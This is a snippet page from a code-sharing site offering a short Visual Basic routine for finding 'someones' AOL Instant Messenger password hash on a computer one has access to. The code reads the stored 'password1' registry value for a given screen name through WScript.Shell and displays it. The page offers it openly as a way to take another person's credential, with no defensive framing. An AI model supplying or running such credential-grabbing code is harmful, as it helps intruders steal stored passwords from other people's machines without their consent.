- Home
·
- Miscellaneous
·
- This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com
This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com
This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their computer. It goes in to the registry and finds
Rate This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com
(1(1 Vote))
Private Sub Command1_Click()
Dim sn As String
sn = Text2.Text
Set wshshell = CreateObject("WScript.Shell")
Text1.Text = wshshell.RegRead("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" + sn + "\Login\password1")
End Sub
This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com Comments
No comments yet — be the first to post one!
Post a Comment